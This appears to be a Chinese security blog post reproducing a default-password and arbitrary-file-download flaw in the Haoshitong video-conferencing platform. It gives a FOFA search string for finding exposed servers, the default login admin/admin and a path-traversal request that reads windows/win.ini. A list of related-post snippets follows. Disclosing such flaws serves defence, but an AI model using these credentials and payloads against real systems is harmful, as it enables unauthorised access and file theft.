好视通视频会议平台存在默认口令任意文件下载

0x00 产品介绍

深圳齐心好视通云计算有限公司是国内知名的云计算产品和服务提供商，隶属于齐心集团（股票代码：002301）。公司旗下“好视通”是国内云视频会议知名品牌，连续三年在云视频会议市场占有率第一（数据来源IDC调研报告），其应用范围主要包含：远程会议，远程教育，远程培训，远程医疗，远程招聘，应急指挥等。

0x01漏洞简介

好视通视频会议平台系统存在弱口令和任意文件下载漏洞。

0x02 Fofa语法

“深圳银澎云计算有限公司”

搜索结果如下：

0x03 漏洞复现

1、目标站点如下所示：

2、默认口令 admin/admin 登录：

3、任意文件下载，Payload： /register/toDownload.do?fileName=…/…/…/…/…/…/…/…/…/…/…/…/…/…/windows/win.ini，效果如下：

免责声明：本人坚决反对利用教学方法进行犯罪的行为，一切犯罪行为必将受到严惩，绿色网络需要我们共同维护，更推荐大家了解它们背后的原理，更好地进行防护。

好视通视频会议平台存在默认口令任意文件下载相关推荐

signal软件如何退出账号_好视通视频会议软件app下载|好视通视频会议软件 3.15.7.15 官方版...
这是一款比较不错的平台,给于玩家的帮助比较大,在多方面的都给于用户比较不错的体验.一般情况上看,我们在很多方面都有使用这个软件的地方,如果有什么对于软件使用不好的反馈,可以随时评论. 好视通视频会议软 ...
什么是云视通开放平台？
什么是云视通开放平台? 云视通是中维世纪依托在视频安防领域二十余年的业务积累及在图像处理.大数据.云计算及视觉人工智能等方面的深入技术研究,基于开放.共享.安全的设计理念,快速敏捷为行业提供高并发.低 ...
云视通开放平台——携手行业开发者，助力智慧渔业应用管理
项目背景智慧农业依托部署在农业生产现场的各种物联网数据(视频数据.环境温湿度.土壤水分.二氧化碳等)和无线通信网络实现农业生产环境的智能感知.智能预警.智能决策.智能分析.专家在线指导等技术,为农业 ...
【常见问题】云视通开放平台播放地址有效期
关于视频播放地址有效期的疑问很多开发者看到了官网的接口文档后(如下图内容),心里会有个疑问,这些获取到的视频播放地址,它的有效期是多久呢? 这个问题我们拆开来看怎么样才能拿到这个播放地址呢? 首先 ...
云视通开放平台对应终端都应该使用什么协议播放
JVMP协议(中维私有协议).HLS协议(标准流).RTMP协议(标准流).FLV.P2P,每种协议有各自的优点和缺点.下面以各设备兼容性.性能.跨平台.扩展性进行详细比较国标设备客户业务系统形态 ...
山东大学软件学院项目实训-创新实训-山大软院网络攻防靶场实验平台（十三）-任意文件下载漏洞（1）
目录前言: 一.任意文件下载 1.任意文件下载漏洞简介 1.1.简介 1.2.危害 1.3.利用 1.4.防范 2.项目配置前言: 前面的博客记录了关于文件上传漏洞的基础知识,以及基本的漏洞出现点 ...
视频会议系统服务器不稳定,视频会议系统常见问题 - 好视通
如何选择视频会议软件,建设视频会议系统来建立快速高效的沟通渠道,使得视频会议软件应用日渐流行,好视通作为视频通信领域的"领先者",凭借低廉的投入成本.灵活的部署等突出的应用优势,成 ...
【第三方OA对接】02 好视通对接项目总结
前言好视通的开发功能仅限于开通免费租户,一个管理员账号提供所有人使用,作为渠道商,我们只需要调用好视通开通租户,创建视频会议等相关API. 业务逻辑一.渠道商授权开通好视通租户二.创建视频会议 ...
AVCON6 系统管理平台 download.action 任意文件下载漏洞
漏洞描述: 华平信息技术股份有限公司是一家视讯产品与应用提供商,掌握视频处理.视音频编解码和网络适应性等.AVCON6 系统管理平台 download.action 存在任意文件下载漏洞,攻击者通过漏 ...